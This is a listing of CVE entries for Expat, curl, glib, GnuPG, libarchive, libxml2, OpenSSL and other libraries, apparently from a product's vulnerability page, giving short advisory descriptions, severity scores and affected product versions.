            CVE-2022-22827storeAtts in xmlparse.c in Expat (aka libexpat) before 2.4.3 has an integer overflow.MEDIUM

            NVD: 8.8

            RedHat: 8.8

            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-23852Expat (aka libexpat) before 2.4.4 has a signed integer overflow in XML_GetBuffer, for configurations with a nonzero XML_CONTEXT_BYTES.MEDIUM

            NVD: 9.8

            RedHat: 9.8

            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-23990Expat (aka libexpat) before 2.4.4 has an integer overflow in the doProlog function.MEDIUM

            NVD: 7.5

            RedHat: 6.5

            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-0536Improper Removal of Sensitive Information Before Storage or Transfer in NPM follow-redirects prior to 1.14.8.MEDIUM

            NVD: 5.9

            RedHat: 5.9

            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-0512Authorization Bypass Through User-Controlled Key in NPM url-parse prior to 1.5.6.MEDIUM

            NVD: 5.3

            RedHat: 8.8

            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-0639Authorization Bypass Through User-Controlled Key in NPM url-parse prior to 1.5.7.MEDIUM

            NVD: 5.3

            RedHat: 6.2

            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2022-0691Authorization Bypass Through User-Controlled Key in NPM url-parse prior to 1.5.9.MEDIUM

            NVD: 9.8

            RedHat: 9.8

            • 8.0.0
            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            CVE-2024-11053When asked to both use a `.netrc` file for credentials and to follow HTTP redirects, curl could leak the password used for the first host to the followed-to host under certain circumstances. This flaw only manifests itself if the netrc file has an entry that matches the redirect target hostname but the entry either omits just the password or omits both login and password.LOW

            NVD: n/a

            RedHat: 5.9

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2024-7264libcurl's ASN1 parser code has the `GTime2str()` function, used for parsing an ASN.1 Generalized Time field. If given an syntactically incorrect field, the parser might end up using -1 for the length of the *time fraction*, leading to a `strlen()` getting performed on a pointer to a heap buffer area that is not (purposely) null terminated. This flaw most likely leads to a crash, but can also lead to heap contents getting returned to the application when [CURLINFO_CERTINFO](https://curl.se/libcurl/c/CURLINFO_CERTINFO.html) is used.LOW

            NVD: 6.5

            RedHat: 5.3

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2024-9681When curl is asked to use HSTS, the expiry time for a subdomain might overwrite a parent domain's cache entry, making it end sooner or later than otherwise intended. This affects curl using applications that enable HSTS and use URLs with the insecure `HTTP://` scheme and perform transfers with hosts like `x.example.com` as well as `example.com` where the first host is a subdomain of the second host. (The HSTS cache either needs to have been populated manually or there needs to have been previous HTTPS accesses done as the cache needs to have entries for the domains involved to trigger this problem.) When `x.example.com` responds with `Strict-Transport-Security:` headers, this bug can make the subdomain's expiry timeout *bleed over* and get set for the parent domain `example.com` in curl's HSTS cache. The result of a triggered bug is that HTTP accesses to `example.com` get converted to HTTPS for a different period of time than what was asked for by the origin server. If `example.com` for example stops supporting HTTPS at its expiry time, curl might then fail to access `http://example.com` until the (wrongly set) timeout expires. This bug can also expire the parent's entry *earlier*, thus making curl inadvertently switch back to insecure HTTP earlier than otherwise intended.LOW

            NVD: 6.5

            RedHat: 3.9

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2025-14524When an OAuth2 bearer token is used for an HTTP(S) transfer, and that transfer performs a cross-protocol redirect to a second URL that uses an IMAP, LDAP, POP3 or SMTP scheme, curl might wrongly pass on the bearer token to the new target host.LOW

            NVD: n/a

            RedHat: 6.5

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.18.2
            • 8.18.1
            CVE-2025-14819When doing TLS related transfers with reused easy or multi handles and altering the `CURLSSLOPT_NO_PARTIALCHAIN` option, libcurl could accidentally reuse a CA store cached in memory for which the partial chain option was reversed. Contrary to the user's wishes and expectations. This could make libcurl find and accept a trust chain that it otherwise would not.LOW

            NVD: n/a

            RedHat: 6.8

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.18.2
            • 8.18.1
            CVE-2025-15079When doing SSH-based transfers using either SCP or SFTP, and setting the known_hosts file, libcurl could still mistakenly accept connecting to hosts *not present* in the specified file if they were added as recognized in the libssh *global* known_hosts file.LOW

            NVD: n/a

            RedHat: 8.1

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.18.2
            • 8.18.1
            CVE-2025-15224When doing SSH-based transfers using either SCP or SFTP, and asked to do public key authentication, curl would wrongly still ask and authenticate using a locally running SSH agent.LOW

            NVD: n/a

            RedHat: 4.7

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.18.2
            • 8.18.1
            CVE-2026-6276A flaw was found in libcurl. This vulnerability allows for information disclosure when a custom `Host:` header is used in an initial HTTP request, and a subsequent request reuses the same connection without specifying a new `Host:` header. This can lead to libcurl incorrectly sending cookies intended for the first host to the second host, resulting in a cookie leak. This issue is categorized as an Origin Validation Error (CWE-346). Exploitation typically requires specific debugging configurations.LOW

            NVD: n/a

            RedHat: 3.7

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.18.2
            • 8.18.1
            • 8.18.0
            • 8.17.7
            • 8.17.6
            CVE-2025-66382In libexpat through 2.7.3, a crafted file with an approximate size of 2 MiB can lead to dozens of seconds of processing time.LOW

            NVD: 5.5

            RedHat: 2.9

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.18.2
            • 8.18.1
            • 8.18.0
            • 8.17.7
            • 8.17.6
            CVE-2026-24515In libexpat before 2.7.4, XML_ExternalEntityParserCreate does not copy unknown encoding handler user data.LOW

            NVD: 2.5

            RedHat: 2.9

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.18.2
            CVE-2026-41080libexpat before 2.8.0 uses insufficient entropy, and thus hash flooding can occur via a crafted XML document.LOW

            NVD: n/a

            RedHat: 3.7

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2023-4156A heap out-of-bounds read flaw was found in builtin.c in the gawk package. This issue may lead to a crash and could be used to read sensitive information.LOW

            NVD: 7.1

            RedHat: 6.1

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2023-32636A flaw was found in glib, where the gvariant deserialization code is vulnerable to a denial of service introduced by additional input validation added to resolve CVE-2023-29499. The offset table validation may be very slow. This bug does not affect any released version of glib but does affect glib distributors who followed the guidance of glib developers to backport the initial fix for CVE-2023-29499.LOW

            NVD: 7.5

            RedHat: 6.2

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2025-3360A flaw was found in GLib. An integer overflow and buffer under-read occur when parsing a long invalid ISO 8601 timestamp with the g_date_time_new_from_iso8601() function.LOW

            NVD: n/a

            RedHat: 3.7

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2025-7039A flaw was found in glib. An integer overflow during temporary file creation leads to an out-of-bounds memory access, allowing an attacker to potentially perform path traversal or access private temporary file content by creating symbolic links. This vulnerability allows a local attacker to manipulate file paths and access unauthorized data. The core issue stems from insufficient validation of file path lengths during temporary file operations.LOW

            NVD: n/a

            RedHat: 3.7

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2026-0988A flaw was found in glib. Missing validation of offset and count parameters in the g_buffered_input_stream_peek() function can lead to an integer overflow during length calculation. When specially crafted values are provided, this overflow results in an incorrect size being passed to memcpy(), triggering a buffer overflow. This can cause application crashes, leading to a Denial of Service (DoS).LOW

            NVD: n/a

            RedHat: 3.7

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2026-1485A flaw was found in Glib's content type parsing logic. This buffer underflow vulnerability occurs because the length of a header line is stored in a signed integer, which can lead to integer wraparound for very large inputs. This results in pointer underflow and out-of-bounds memory access. Exploitation requires a local user to install or process a specially crafted treemagic file, which can lead to local denial of service or application instability.LOW

            NVD: n/a

            RedHat: 2.8

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2026-4438Calling gethostbyaddr or gethostbyaddr_r with a configured nsswitch.conf that specifies the library's DNS backend in the GNU C library version 2.34 to version 2.43 could result in an invalid DNS hostname being returned to the caller in violation of the DNS specification.LOW

            NVD: n/a

            RedHat: 4

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.18.2
            • 8.18.1
            • 8.18.0
            • 8.17.7
            • 8.17.6
            CVE-2022-3219GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.LOW

            NVD: 3.3

            RedHat: 6.2

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2025-30258In GnuPG before 2.5.5, if a user chooses to import a certificate with certain crafted subkey data that lacks a valid backsig or that has incorrect usage flags, the user loses the ability to verify signatures made from certain other signing keys, aka a "verification DoS."LOW

            NVD: 4.7

            RedHat: 2.7

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2026-24883In GnuPG before 2.5.17, a long signature packet length causes parse_signature to return success with sig->data[] set to a NULL value, leading to a denial of service (application crash).LOW

            NVD: 5.5

            RedHat: 3.7

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2026-3832A flaw was found in gnutls. A remote attacker could exploit this vulnerability by presenting a specially crafted Online Certificate Status Protocol (OCSP) response during a TLS handshake. Due to a logic error in how gnutls processes multi-record OCSP responses, a client with OCSP verification enabled may incorrectly accept a revoked server certificate, potentially leading to a compromise of trust.LOW

            NVD: n/a

            RedHat: 3.7

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2025-1632A vulnerability was found in libarchive up to 3.7.7. It has been classified as problematic. This affects the function list of the file bsdunzip.c. The manipulation leads to null pointer dereference. It is possible to launch the attack on the local host. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.LOW

            NVD: 5.5

            RedHat: 3.3

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2025-5915A vulnerability has been identified in the libarchive library. This flaw can lead to a heap buffer over-read due to the size of a filter block potentially exceeding the Lempel-Ziv-Storer-Schieber (LZSS) window. This means the library may attempt to read beyond the allocated memory buffer, which can result in unpredictable program behavior, crashes (denial of service), or the disclosure of sensitive information from adjacent memory regions.LOW

            NVD: 6.6

            RedHat: 6.6

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2025-5916A vulnerability has been identified in the libarchive library. This flaw involves an integer overflow that can be triggered when processing a Web Archive (WARC) file that claims to have more than INT64_MAX - 4 content bytes. An attacker could craft a malicious WARC archive to induce this overflow, potentially leading to unpredictable program behavior, memory corruption, or a denial-of-service condition within applications that process such archives using libarchive. This bug affects libarchive versions prior to 3.8.0.LOW

            NVD: 5.6

            RedHat: 3.9

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2025-5917A vulnerability has been identified in the libarchive library. This flaw involves an 'off-by-one' miscalculation when handling prefixes and suffixes for file names. This can lead to a 1-byte write overflow. While seemingly small, such an overflow can corrupt adjacent memory, leading to unpredictable program behavior, crashes, or in specific circumstances, could be leveraged as a building block for more sophisticated exploitation. This bug affects libarchive versions prior to 3.8.0.LOW

            NVD: 5

            RedHat: 2.8

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2025-5918A vulnerability has been identified in the libarchive library. This flaw can be triggered when file streams are piped into bsdtar, potentially allowing for reading past the end of the file. This out-of-bounds read can lead to unintended consequences, including unpredictable program behavior, memory corruption, or a denial-of-service condition.LOW

            NVD: 6.6

            RedHat: 3.9

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2022-27943libiberty/rust-demangle.c in GNU GCC 11.2 allows stack consumption in demangle_const, as demonstrated by nm-new.LOW

            NVD: 5.5

            RedHat: 5.5

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2026-41990Libgcrypt before 1.12.2 mishandles Dilithium signing. Writes to a static array lack a bounds check but do not use attacker-controlled data.LOW

            NVD: n/a

            RedHat: 3.3

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2025-13151Stack-based buffer overflow in libtasn1 version: v4.20.0. The function fails to validate the size of input data resulting in a buffer overflow in asn1_expend_octet_string.LOW

            NVD: n/a

            RedHat: 5.9

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2023-45322libxml2 through 2.11.5 has a use-after-free that can only occur after a certain memory allocation fails. This occurs in xmlUnlinkNode in tree.c. NOTE: the vendor's position is "I don't think these issues are critical enough to warrant a CVE ID ... because an attacker typically can't control when memory allocations fail."LOW

            NVD: 6.5

            RedHat: 5.9

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2024-34459An issue was discovered in xmllint (from libxml2) before 2.11.8 and 2.12.x before 2.12.7. Formatting error messages with xmllint --htmlout can result in a buffer over-read in xmlHTMLPrintFileContext in xmllint.c.LOW

            NVD: n/a

            RedHat: 5.5

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2025-27113libxml2 before 2.12.10 and 2.13.x before 2.13.6 has a NULL pointer dereference in xmlPatMatch in pattern.c.LOW

            NVD: 7.5

            RedHat: 3.1

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2025-6170A flaw was found in the interactive shell of the xmllint command-line tool, used for parsing XML files. When a user inputs an overly long command, the program does not check the input size properly, which can cause it to crash. This issue might allow attackers to run harmful code in rare configurations without modern protections.LOW

            NVD: 2.5

            RedHat: 2.5

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2026-0989A flaw was identified in the RelaxNG parser of libxml2 related to how external schema inclusions are handled. The parser does not enforce a limit on inclusion depth when resolving nested <include> directives. Specially crafted or overly complex schemas can cause excessive recursion during parsing. This may lead to stack exhaustion and application crashes, creating a denial-of-service risk.LOW

            NVD: n/a

            RedHat: 3.7

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2026-0992A flaw was found in the libxml2 library. This uncontrolled resource consumption vulnerability occurs when processing XML catalogs that contain repeated <nextCatalog> elements pointing to the same downstream catalog. A remote attacker can exploit this by supplying crafted catalogs, causing the parser to redundantly traverse catalog chains. This leads to excessive CPU consumption and degrades application availability, resulting in a denial-of-service condition.LOW

            NVD: n/a

            RedHat: 2.9

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2023-50495NCurse v6.4-20230418 was discovered to contain a segmentation fault via the component _nc_wrap_entry().LOW

            NVD: 6.5

            RedHat: 6.5

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2020-12413The Raccoon attack is a timing attack on DHE ciphersuites inherit in the TLS specification. To mitigate this vulnerability, Firefox disabled support for DHE ciphersuites.LOW

            NVD: 5.9

            RedHat: 5.9

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2024-7531Calling `PK11_Encrypt()` in NSS using CKM_CHACHA20 and the same buffer for input and output can result in plaintext on an Intel Sandy Bridge processor. In Firefox this only affects the QUIC header protection feature when the connection is using the ChaCha20-Poly1305 cipher suite. The most likely outcome is connection failure, but if the connection persists despite the high packet loss it could be possible for a network observer to identify packets as coming from the same source despite a network path change. This vulnerability affects Firefox < 129, Firefox ESR < 115.14, and Firefox ESR < 128.1.LOW

            NVD: 6.5

            RedHat: 3.1

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2026-2673Issue summary: An OpenSSL TLS 1.3 server may fail to negotiate the expected preferred key exchange group when its key exchange group configuration includes the default by using the 'DEFAULT' keyword. Impact summary: A less preferred key exchange may be used even when a more preferred group is supported by both client and server, if the group was not included among the client's initial predicated keyshares. This will sometimes be the case with the new hybrid post-quantum groups, if the client chooses to defer their use until specifically requested by the server. If an OpenSSL TLS 1.3 server's configuration uses the 'DEFAULT' keyword to interpolate the built-in default group list into its own configuration, perhaps adding or removing specific elements, then an implementation defect causes the 'DEFAULT' list to lose its 'tuple' structure, and all server-supported groups were treated as a single sufficiently secure 'tuple', with the server not sending a Hello Retry Request (HRR) even when a group in a more preferred tuple was mutually supported. As a result, the client and server might fail to negotiate a mutually supported post-quantum key agreement group, such as 'X25519MLKEM768', if the client's configuration results in only 'classical' groups (such as 'X25519' being the only ones in the client's initial keyshare prediction). OpenSSL 3.5 and later support a new syntax for selecting the most preferred TLS 1.3 key agreement group on TLS servers. The old syntax had a single 'flat' list of groups, and treated all the supported groups as sufficiently secure. If any of the keyshares predicted by the client were supported by the server the most preferred among these was selected, even if other groups supported by the client, but not included in the list of predicted keyshares would have been more preferred, if included. The new syntax partitions the groups into distinct 'tuples' of roughly equivalent security. Within each tuple the most preferred group included among the client's predicted keyshares is chosen, but if the client supports a group from a more preferred tuple, but did not predict any corresponding keyshares, the server will ask the client to retry the ClientHello (by issuing a Hello Retry Request or HRR) with the most preferred mutually supported group. The above works as expected when the server's configuration uses the built-in default group list, or explicitly defines its own list by directly defining the various desired groups and group 'tuples'. No OpenSSL FIPS modules are affected by this issue, the code in question lies outside the FIPS boundary. OpenSSL 3.6 and 3.5 are vulnerable to this issue. OpenSSL 3.6 users should upgrade to OpenSSL 3.6.2 once it is released. OpenSSL 3.5 users should upgrade to OpenSSL 3.5.6 once it is released. OpenSSL 3.4, 3.3, 3.0, 1.0.2 and 1.1.1 are not affected by this issue.LOW

            NVD: n/a

            RedHat: 3.1

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2024-13176Issue summary: A timing side-channel which could potentially allow recovering the private key exists in the ECDSA signature computation. Impact summary: A timing side-channel in ECDSA signature computations could allow recovering the private key by an attacker. However, measuring the timing would require either local access to the signing application or a very fast network connection with low latency. There is a timing signal of around 300 nanoseconds when the top word of the inverted ECDSA nonce value is zero. This can happen with significant probability only for some of the supported elliptic curves. In particular the NIST P-521 curve is affected. To be able to measure this leak, the attacker process must either be located in the same physical computer or must have a very fast network connection with low latency. For that reason the severity of this vulnerability is Low. The FIPS modules in 3.4, 3.3, 3.2, 3.1 and 3.0 are affected by this issue.LOW

            NVD: n/a

            RedHat: 4.7

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2024-41996Validating the order of the public keys in the Diffie-Hellman Key Agreement Protocol, when an approved safe prime is used, allows remote attackers (from the client side) to trigger unnecessarily expensive server-side DHE modular-exponentiation calculations. The client may cause asymmetric resource consumption. The basic attack scenario is that the client must claim that it can only communicate with DHE, and the server must be configured to allow DHE and validate the order of the public key.LOW

            NVD: n/a

            RedHat: 5.9

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2025-9232Issue summary: An application using the OpenSSL HTTP client API functions may trigger an out-of-bounds read if the 'no_proxy' environment variable is set and the host portion of the authority component of the HTTP URL is an IPv6 address. Impact summary: An out-of-bounds read can trigger a crash which leads to Denial of Service for an application. The OpenSSL HTTP client API functions can be used directly by applications but they are also used by the OCSP client functions and CMP (Certificate Management Protocol) client implementation in OpenSSL. However the URLs used by these implementations are unlikely to be controlled by an attacker. In this vulnerable code the out of bounds read can only trigger a crash. Furthermore the vulnerability requires an attacker-controlled URL to be passed from an application to the OpenSSL function and the user has to have a 'no_proxy' environment variable set. For the aforementioned reasons the issue was assessed as Low severity. The vulnerable code was introduced in the following patch releases: 3.0.16, 3.1.8, 3.2.4, 3.3.3, 3.4.0 and 3.5.0. The FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this issue, as the HTTP client implementation is outside the OpenSSL FIPS module boundary.LOW

            NVD: n/a

            RedHat: 3.1

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2026-28387Issue summary: An uncommon configuration of clients performing DANE TLSA-based server authentication, when paired with uncommon server DANE TLSA records, may result in a use-after-free and/or double-free on the client side. Impact summary: A use after free can have a range of potential consequences such as the corruption of valid data, crashes or execution of arbitrary code. However, the issue only affects clients that make use of TLSA records with both the PKIX-TA(0/PKIX-EE(1) certificate usages and the DANE-TA(2) certificate usage. By far the most common deployment of DANE is in SMTP MTAs for which RFC7672 recommends that clients treat as 'unusable' any TLSA records that have the PKIX certificate usages. These SMTP (or other similar) clients are not vulnerable to this issue. Conversely, any clients that support only the PKIX usages, and ignore the DANE-TA(2) usage are also not vulnerable. The client would also need to be communicating with a server that publishes a TLSA RRset with both types of TLSA records. No FIPS modules are affected by this issue, the problem code is outside the FIPS module boundary.LOW

            NVD: 8.1

            RedHat: 3.7

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.18.2
            • 8.18.1
            • 8.18.0
            • 8.17.7
            CVE-2026-28388Issue summary: When a delta CRL that contains a Delta CRL Indicator extension is processed a NULL pointer dereference might happen if the required CRL Number extension is missing. Impact summary: A NULL pointer dereference can trigger a crash which leads to a Denial of Service for an application. When CRL processing and delta CRL processing is enabled during X.509 certificate verification, the delta CRL processing does not check whether the CRL Number extension is NULL before dereferencing it. When a malformed delta CRL file is being processed, this parameter can be NULL, causing a NULL pointer dereference. Exploiting this issue requires the X509_V_FLAG_USE_DELTAS flag to be enabled in the verification context, the certificate being verified to contain a freshestCRL extension or the base CRL to have the EXFLAG_FRESHEST flag set, and an attacker to provide a malformed CRL to an application that processes it. The vulnerability is limited to Denial of Service and cannot be escalated to achieve code execution or memory disclosure. For that reason the issue was assessed as Low severity according to our Security Policy. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.LOW

            NVD: 7.5

            RedHat: 5.9

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.18.2
            • 8.18.1
            • 8.18.0
            • 8.17.7
            CVE-2026-28389Issue summary: During processing of a crafted CMS EnvelopedData message with KeyAgreeRecipientInfo a NULL pointer dereference can happen. Impact summary: Applications that process attacker-controlled CMS data may crash before authentication or cryptographic operations occur resulting in Denial of Service. When a CMS EnvelopedData message that uses KeyAgreeRecipientInfo is processed, the optional parameters field of KeyEncryptionAlgorithmIdentifier is examined without checking for its presence. This results in a NULL pointer dereference if the field is missing. Applications and services that call CMS_decrypt() on untrusted input (e.g., S/MIME processing or CMS-based protocols) are vulnerable. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.LOW

            NVD: 7.5

            RedHat: 5.9

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.18.2
            • 8.18.1
            • 8.18.0
            • 8.17.7
            CVE-2026-31789Issue summary: Converting an excessively large OCTET STRING value to a hexadecimal string leads to a heap buffer overflow on 32 bit platforms. Impact summary: A heap buffer overflow may lead to a crash or possibly an attacker controlled code execution or other undefined behavior. If an attacker can supply a crafted X.509 certificate with an excessively large OCTET STRING value in extensions such as the Subject Key Identifier (SKID) or Authority Key Identifier (AKID) which are being converted to hex, the size of the buffer needed for the result is calculated as multiplication of the input length by 3. On 32 bit platforms, this multiplication may overflow resulting in the allocation of a smaller buffer and a heap buffer overflow. Applications and services that print or log contents of untrusted X.509 certificates are vulnerable to this issue. As the certificates would have to have sizes of over 1 Gigabyte, printing or logging such certificates is a fairly unlikely operation and only 32 bit platforms are affected, this issue was assigned Low severity. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.LOW

            NVD: 9.8

            RedHat: 5.8

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.18.2
            • 8.18.1
            • 8.18.0
            • 8.17.7
            CVE-2022-41409Integer overflow vulnerability in pcre2test before 10.41 allows attackers to cause a denial of service or other unspecified impacts via negative input.LOW

            NVD: 7.5

            RedHat: 5.3

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2025-1795During an address list folding when a separating comma ends up on a folded line and that line is to be unicode-encoded then the separator itself is also unicode-encoded. Expected behavior is that the separating comma remains a plan comma. This can result in the address header being misinterpreted by some mail servers.LOW

            NVD: n/a

            RedHat: 3.1

            • 9.4.0
            • 9.3.4
            • 9.3.3
            • 9.3.2
            • 9.3.1
            • 8.19.15
            • 8.19.14
            • 8.19.13
            • 8.19.12
            • 8.19.11
            CVE-2026-2297The import hook in CPython that handles legacy *.pyc files (SourcelessFileLoader) is incorrectly handled in FileLoader (a base class) and so does not use io.open_code() to read the .pyc files. sys.audit handlers for this audit event therefore do not fire.LOW

            NVD: n/a

            RedHat: 3.3

            • 9.4.0
            • 9.3.4
            • 9.3.3
